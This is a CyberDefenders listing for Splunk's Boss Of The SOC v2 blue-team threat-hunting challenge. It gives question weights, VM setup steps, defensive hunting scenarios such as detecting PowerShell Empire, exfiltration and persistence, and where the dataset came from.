Boss Of The SOC v2 blue team ctf
Category : Threat Hunting
-
Weight : 50 | Solved : 1638
-
Weight : 100 | Solved : 1078
-
Weight : 100 | Solved : 1059
-
Weight : 100 | Solved : 1038
-
Weight : 500 | Solved : 971
-
Weight : 500 | Solved : 985
-
Weight : 100 | Solved : 996
-
Weight : 500 | Solved : 985
-
Weight : 100 | Solved : 924
-
Weight : 1000 | Solved : 749
-
Weight : 1500 | Solved : 491
-
Weight : 500 | Solved : 618
-
Weight : 100 | Solved : 661
-
Weight : 1000 | Solved : 588
-
Weight : 500 | Solved : 607
-
Weight : 100 | Solved : 608
-
Weight : 250 | Solved : 502
-
Weight : 500 | Solved : 453
-
Weight : 500 | Solved : 482
-
Weight : 250 | Solved : 322
-
Weight : 250 | Solved : 430
-
Weight : 250 | Solved : 424
-
Weight : 100 | Solved : 442
-
Weight : 100 | Solved : 408
-
Weight : 100 | Solved : 299
-
Weight : 100 | Solved : 333
-
Weight : 500 | Solved : 331
-
Weight : 500 | Solved : 331
-
Weight : 500 | Solved : 311
-
Weight : 500 | Solved : 283
-
Weight : 500 | Solved : 258
-
Weight : 500 | Solved : 134
-
Weight : 500 | Solved : 251
-
Weight : 100 | Solved : 248
-
Weight : 1000 | Solved : 244
-
Weight : 100 | Solved : 252
Instructions:
- Virtualbox: unzip the VM (pass: cyberdefenders.org), start VM, and access Splunk from host machine via http://127.0.0.1:8000
- VMware: login to the VM using vagrant/vagrant and grab the IP address of the VM using "IP address" command. Access Splunk from the host machine using the IP address assigned to the VM via http://x.x.x.x:8000
- Challenge Files:
- bots2.ova (Memory: 4 GB, CPU: 2 Cores, Disk: 17.5 GB).
APT Scenarios:
In this hands-on exercise, you assume the persona of Alice Bluebird, the soc analyst who successfully assisted Wayne Enterprises and was recommended to Grace Hoppy at Frothly to assist them with their recent issues.
Hunting Scenarios:
- PowerShell: Adversaries will use PowerShell Empire to establish a foothold and carry out attacks.
- Exfiltration Over Alternative Protocol - FTP: Data Exfiltration may occur using common network protocols, principally FTP
- Exfiltration Over Alternative Protocol - DNS: Data Exfiltration may occur using common network protocols, specifically DNS
- Adversary Infrastructure: The adversary has established multiple components of infrastructure beyond what we have already uncovered.
- Spearphishing Attachment: Adversaries will attempt to establish a foothold within Froth.ly using Phishing.
- User Execution: Adversaries will attempt to establish a foothold within Froth.ly by enticing a user to execute an action on a file.
- Persistence - Create Account: An adversary will look to maintain persistence across an enterprise by creating user accounts.
- Persistence - Scheduled Task: An adversary will look to maintain persistence across reboots by using a task scheduler.
- Indicator Removal On Host: Clearing of audit / event logs could indicate an adversary attempting to cover their tracks.
- Reconaissance: User Agent Strings may provide insight into an adversary that they may not have intended to show.
- OSINT: Identifying publicly available company information and who is accessing it may provide insight into the adversary.
- Lateral Movement: Adversaries will look to move laterally to other systems using Windows Management Instrumentation (WMI).
- Data Staging: Adversaries will stage data prior to exfiltration to make it easier to extract data at a time of their choosing as well as have a central place to place information as it is identified.
The data included in this app was generated in August of 2017 by members of Splunk's Security Specialist team - Dave Herrald, Ryan Kovar, Steve Brant, Jim Apger, John Stoner, Ken Westin, David Veuve and James Brodsky. They stood up a few lab environments connected to the Internet. Within the environment they had a few Windows endpoints instrumented with the Splunk Universal Forwarder and Splunk Stream. The forwarders were configured with best practices for Windows endpoint monitoring, including a full Microsoft Sysmon deployment and best practices for Windows Event logging. The environment included a Palo Alto Networks next-generation firewall to capture traffic and provide web proxy services, and Suricata to provide network-based IDS. This resulted in the dataset below.
If you would like to learn more about Hunting with Splunk, here are some handy resources that you can check out:
WriteUps
Submit Writeup-
SHA1SUM:2bc6bb7a92ed7341f8a4c61c456dd7b53f9be990
-
Password:cyberdefenders.org
-
Size:12 GiB
-
Published:Aug. 4, 2020, midnight
Authors